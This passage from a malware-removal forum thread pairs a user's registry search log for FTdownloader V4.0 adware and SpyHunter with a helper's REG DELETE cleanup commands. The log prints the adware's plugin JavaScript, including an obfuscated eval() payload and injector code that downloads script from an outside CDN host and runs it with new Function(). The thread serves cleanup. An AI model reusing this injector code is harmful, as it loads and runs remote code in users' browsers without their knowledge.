        try { innergaq.init('UA-41261898-1', version , 'FTDownloader_V4.0');} catch (e) {};
        injectorBack.init("ftdown4", version, "htd");
});

"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Db\Async-Local\js]
"Value"=""\"eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\\\\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\\\\\\b'+e(c)+'\\\\\\\\b','g'),k[c]);return p}('$=$||dy;t 1B=1x.5N();aY();if(1B==\\\"aX\\\"||1B==\\\"aW\\\"||1B==\\\"aV\\\"||1B==\\\"5z\\\"||1B==\\\"aU\\\"||1B==\\\"aT\\\"||1B==\\\"ho\\\"||1B==\\\"aS\\\"||1B==\\\"aR\\\"||1B==\\\"aQ\\\"||1B==\\\"aJ\\\"||1B==\\\"aC\\\"||1B==\\\"aB\\\"||1B==\\\"az\\\"||1B==\\\"ay\\\"||1B==\\\"aw\\\"||1B==\\\"au\\\"||1B==\\\"5s\\\"){as()}y 3l(){t c=2x 3E();t d=c.d7();t e=c.h2();t f={b3:d,bY:e};t g=2x 3E(c.an(),c.ak(),c.ag());if(!$.3U.3W){2l.2n.2o({\\\\'o\\\\':\\\\'5y\\\\',\\\\'b8\\\\':f},y(a){if(a.5B==5G()){1i}t b=(a.3X)?(g.2U()-3d(a.3X))>=ac:1P;if(a.2V==
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Manifest]
"Name"="FTdownloader V4.0"

Searching for "Spyhunter"
[HKEY_CURRENT_USER\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Program Files\Enigma Software Group\SpyHunter\Defs\"="1"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders]
"C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"=""
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\167ED423049710645A22436AA88D0A99]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\1F94163E4B8E8524AB2D208677C1C639]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoCheckUpdate"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\21B3B2A547DD5C14583129BD7D54AE43]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\270D6EC2A97B99548BA1F764A91027A1]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\2BAC083D35096B44C91BE7BCF2A9BE35]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\325484F6157B534449A295F31E20CC49]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\EsgScanner.inf"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3A1F744C14FB4E14A93C1628CDE36240]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorWinCom_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\3B801397615ADA446AA0C0D27F8C35F5]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ShieldOnBoot"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\4EE16055EDFAB8E46BCE054F706E7050]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Users\Moritz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5942B0FB3B0060E4FB3008F9D51CFC26]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\native.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\5A2C306FF7B069949928B69774A9C8A0]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\GuardStatus"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\64717EB28EB8ECA4A9584B6BA7934B83]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActiveDesktop_remember"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\79455857BB467F24D81891AAD09F7079]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGScanner.sys"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8014B476AFF7674499E83E22C791A5A2]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\SH4Service.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\8D95E4363DF07F44FB6986E629D65FDB]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\ActHomePageProt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\96F935B48BE0455459DB1E7E97E04BDF]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorDNS"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\9BDCF589B9440364E8DB3F9535DDBB9F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Defman.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B435C9AD1BF350D48BE80D5A79BA2EEE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ESGRKCHK.exe"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\B8759E73AEB287C4485B33F51B7DE868]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorIEImages"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\C2E30ACAB517FB744ACF4672E649BE7F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\Language"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\CA1A35F40F64E2C419551606C418D4C6]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\AutoUpdateDownload"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D23A4A6BB4BD7474197B486733BBB37A]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ShScanner.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D69C9067CD45885488F1E05319EDD023]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\ExecutionGuard.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D75FE63EDA1D54A4CA6F51CADD11E656]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\CheckShOsCompatibility"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\D91BE455A0889C4458F258847859EC6F]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorHosts"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\DD372D2F4DF0D0540B2F37ED85511E4C]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="22:\Software\EnigmaSoftwareGroup\SpyHunter\SpyHunterConfig\MonitorSystem"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\F87702C2D0F509E4FB7923DA78F44976]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Components\FD27396ADF8235D449146899FD9100FE]
"6BFC3EA82B8755F47AEB16F8FC4FA330"="C:\Program Files\Enigma Software Group\SpyHunter\Common.dll"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-21-2589869786-1695837759-112009712-1001\Products\6BFC3EA82B8755F47AEB16F8FC4FA330\InstallProperties]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayIcon"="C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe,0"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"InstallLocation"="C:\Program Files\Enigma Software Group\SpyHunter\"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{8AE3CFB6-78B2-4F55-A7BE-618FCFF43A03}]
"DisplayName"="SpyHunter"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{2ADE6BE8-2517-44DA-8E26-F013C9BE50A9}]
"Path"="\SpyHunter4Startup"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SpyHunter4Startup]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"DisplayName"="SpyHunter 4 Service"
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\services\SpyHunter 4 Service]
"Description"="SpyHunter 4 Helper Service"
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\esgiguard]
"ImagePath"="\??\C:\Program Files\Enigma Software Group\SpyHunter\esgiguard.sys"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Installer\Products\6BFC3EA82B8755F47AEB16F8FC4FA330]
"ProductName"="SpyHunter"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Microsoft\Windows\CurrentVersion\Applets\Wordpad\Recent File List]
"File8"="C:\Program Files\Enigma Software Group\SpyHunter\license.txt"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache]
"C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe"="SpyHunter4 application"

Searching for "        "
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
        accountStr: '',
        arrToPush: new Array(),
               
        create: function(q){
                this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
        },
       
    //only after the back loaded - or else the appAPI wont be avilable
    init: function (q, v, nm) {
            var that = this;
            this.accountStr = 'acc='+q + '&nm=' + nm;
            appAPI.message.addListener(function(msg) {
                        that.onRequest(msg);
                });
               
                if (appAPI.db.get("au") == util.getCurrentDate()) {
                    //console.log('exit- no need to use plugin');
                    return;
            }

            function updateAUser(){
                        var install = appAPI.db.get("install") ||  util.getCurrentDate();
                        that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
                        var cnt = appAPI.db.get("cnt");
                if (!cnt || cnt == "" || cnt == undefined) {
                    util.request("hxxp://ext.extdaddy.com/cc
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
        js: "",
        funcName: "",       
        count: 0,
        type: "",
        version: "",
       
          setKey: function(key, value, cb){
      appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
    },
   
    activateCodeInTab: function (code){
            appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
    },
       
        init: function (funcName, version, fileName) {
                var that = this;
                this.funcName = funcName;
                this.type = fileName;
                this.version = version;
               
                appAPI.message.addListener(function(msg) {
                        switch (msg.name){
                                case "getAllKeys":
                                          if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
                                                  that.activateCodeInTab();
                                          }
                                          else {
                                                appAPI.request.get({
                                                url:  msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/" + fileName + "_c.js",
                                                onS
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
        init: function (listenerTriggeredOn) {
                (function ($) {
                        var obj = {};
                        appAPI.message.addListener(function(msg) {
                                if(listenerTriggeredOn == msg.name){
                                        var keys = [];
                                        appAPI.db.async.getList(function(dbItems) {
                                              for (var i = 0; i < dbItems.length; i++) {
                                            keys[dbItems[i].key] = dbItems[i].value;
                                          }
                                        var country = keys.cnt || "";
                                            var json = JSON || appAPI.JSON;
                                           
                                            if(msg.type == "c2"){
                                                    var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
                                                    fn(msg.name, country, msg.version , msg.browser, keys);
                                            }
                                            else if(msg.type == "htd"){
                                                    var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
                                            fn(keys, msg.browser, msg.name, country, msg.version);
 
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[102] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

/**
 * Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
 * information, see hxxp://www.dealply.com/
 * 
 * THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
 * LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
 * OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
 * EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PUR
[HKEY_CURRENT_USER\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[104] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06d4cf351d0b2","1f89d526fc52417e16d99b9f0
[HKEY_LOCAL_MACHINE\SOFTWARE\Dell Computer Corporation\SysInfo]
"System Manufacturer"="Dell Inc.        "
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell]
"ConfigXML"="            <PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" >                <InitializationParameters>                    <Param Name="PSVersion" Value="2.0"/>                </InitializationParameters>                <Resources>                    <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" SupportsOptions="true" ExactMatch="true">                        <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                        <Capability Type="Shell"/>                    </Resource>                </Res
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\WSMAN\Plugin\Microsoft.PowerShell32]
"ConfigXML"="<PlugInConfiguration xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Name="microsoft.powershell32" Filename="%windir%\system32\pwrshplugin.dll" SDKVersion="1" XmlRenderingType="text" Architecture="32" >                        <InitializationParameters>                            <Param Name="PSVersion" Value="2.0"/>                        </InitializationParameters>                        <Resources>                            <Resource ResourceUri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" SupportsOptions="true" ExactMatch="true">                                <Security xmlns="hxxp://schemas.microsoft.com/wbem/wsman/1/config/PluginConfiguration" Uri="hxxp://schemas.microsoft.com/powershell/microsoft.powershell32" ExactMatch="true" Sddl="O:NSG:BAD:P(A;;GA;;;BA)S:P(AU;FA;GA;;;WD)(AU;SA;GXGW;;;WD)"/>                               
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Live\Common]
"Manufacturer"="Dell Inc.        "
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000020]
"JavaScript"="try{
innergaq = {
        accountStr: '',
        arrToPush: new Array(),
               
        create: function(q){
                this.arrToPush.push(this.accountStr + (q ? "&" + q : ''));
        },
       
    //only after the back loaded - or else the appAPI wont be avilable
    init: function (q, v, nm) {
            var that = this;
            this.accountStr = 'acc='+q + '&nm=' + nm;
            appAPI.message.addListener(function(msg) {
                        that.onRequest(msg);
                });
               
                if (appAPI.db.get("au") == util.getCurrentDate()) {
                    //console.log('exit- no need to use plugin');
                    return;
            }

            function updateAUser(){
                        var install = appAPI.db.get("install") ||  util.getCurrentDate();
                        that.create('action=_setCustomVar&index=2&name=Install%20Date&value=' + decodeURIComponent(install) + '&opt_scope=1' );
                        var cnt = appAPI.db.get("cnt");
                if (!cnt || cnt == "" || cnt == undefined) {
                    u
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000027]
"JavaScript"="injectorBack = {
        js: "",
        funcName: "",       
        count: 0,
        type: "",
        version: "",
       
          setKey: function(key, value, cb){
      appAPI.db.async.set(key , value, appAPI.time.hoursFromNow(6), cb);
    },
   
    activateCodeInTab: function (code){
            appAPI.message.toActiveTab({"name": this.funcName, "version": this.version, "browser" : "ie", "type": this.type});
    },
       
        init: function (funcName, version, fileName) {
                var that = this;
                this.funcName = funcName;
                this.type = fileName;
                this.version = version;
               
                appAPI.message.addListener(function(msg) {
                        switch (msg.name){
                                case "getAllKeys":
                                          if (!utils.isCacheTimePass(6, utils.getCrntTime())) {
                                                  that.activateCodeInTab();
                                          }
                                          else {
                                                appAPI.request.get({
                                                url:  msg.protocol + "//secureclick-media-maynemyltf.netdna-ssl.com/Extensions/rjs/"
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\1000028]
"JavaScript"="injector = {
        init: function (listenerTriggeredOn) {
                (function ($) {
                        var obj = {};
                        appAPI.message.addListener(function(msg) {
                                if(listenerTriggeredOn == msg.name){
                                        var keys = [];
                                        appAPI.db.async.getList(function(dbItems) {
                                              for (var i = 0; i < dbItems.length; i++) {
                                            keys[dbItems[i].key] = dbItems[i].value;
                                          }
                                        var country = keys.cnt || "";
                                            var json = JSON || appAPI.JSON;
                                           
                                            if(msg.type == "c2"){
                                                    var fn = new Function("exname", "cnt", "version", "broType", "dataKeys", json.parse(keys['js']));
                                                    fn(msg.name, country, msg.version , msg.browser, keys);
                                            }
                                            else if(msg.type == "htd"){
                                                    var fn = new Function("Datakeys", "btype", "exname", "cnt", "version", json.parse(keys['js']));
                                            fn(keys, msg.browse
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\102]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[102] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

/**
 * Copyright (C) 2012 DealPly Technologies Ltd. All rights reserved. For licensing
 * information, see hxxp://www.dealply.com/
 * 
 * THERE IS NO WARRANTY FOR THE SOFTWARE, TO THE EXTENT PERMITTED BY APPLICABLE
 * LAW. EXCEPT WHEN OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR
 * OTHER PARTIES PROVIDE THE SOFTWARE "AS IS" WITHOUT WARRANTY OF ANY KIND,
 * EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTA
[HKEY_USERS\S-1-5-21-2589869786-1695837759-112009712-1001\Software\AppDataLow\Software\FTdownloader V4.0\Plugins\104]
"JavaScript"="if (typeof appAPI.internal.monetization === "undefined") {
    appAPI.internal.monetization = {};
}
if (typeof appAPI.internal.monetization.plugins === "undefined") {
    appAPI.internal.monetization.plugins = {};
}

appAPI.internal.monetization.plugins[104] = function() {

        if (typeof appAPI.internal.monetization.verticals !== "undefined") {
                if (!appAPI.internal.monetization.verticals.shopping){
                        return;
                }
        }

var permanentData = {gui:[],actions:[]};
var permanentCache = ["c822c1b63853ed273b89687ac505f9fa","738aa8d3bc02eb8712acd0eb2cf6dfd5","2351f600bf62102c56b3941c39225683","16524241cd11b1b1c6b3ab30874047d6","241fe8af1e038118cd817048a65f803e","5ed33f7008771c9d49e3716aeaeca581","e50173d2983f028042965a37357931fc","8e1b7a68ae2f404bfafaafd53d293cde","dc29a383b9b0932dbd9f75e4af9b51f5","f4c4b31d11e30ca1511d807c10cd68f3","8862aa846eeafd1f61c5ad22580d0148","b53e20c91b81ec25a6d06

-= EOF =-

And the FTdownloader, can I just delete it now, or would it be better to carry out other steps there as well? If so, which ones?

cosinus 13.08.2013 13:20

Please press the Windows key + R and type notepad into the Run window.

Now copy the following text from the code box into the empty text document

Code:

reg: REG DELETE "HKCU\Software\AppDataLow\Software\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Classes\FTDownloader"  /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASAPI32" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Tracing\FTDownloader_RASMANCS" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{72894989-0776-4934-9248-8858C46BDD68}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{C01CE44C-B492-48A0-8760-6C6E60580C32}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E7B37535-FC07-4795-8257-AA6905D9042B}" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-codedownloader" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-enabler" /f
reg: REG DELETE "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\FTdownloader V4.0-updater" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\FTdownloader V4.0" /f
reg: REG DELETE "HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\lgnbhdnimikkoodkogjlcllngimhlapp" /f
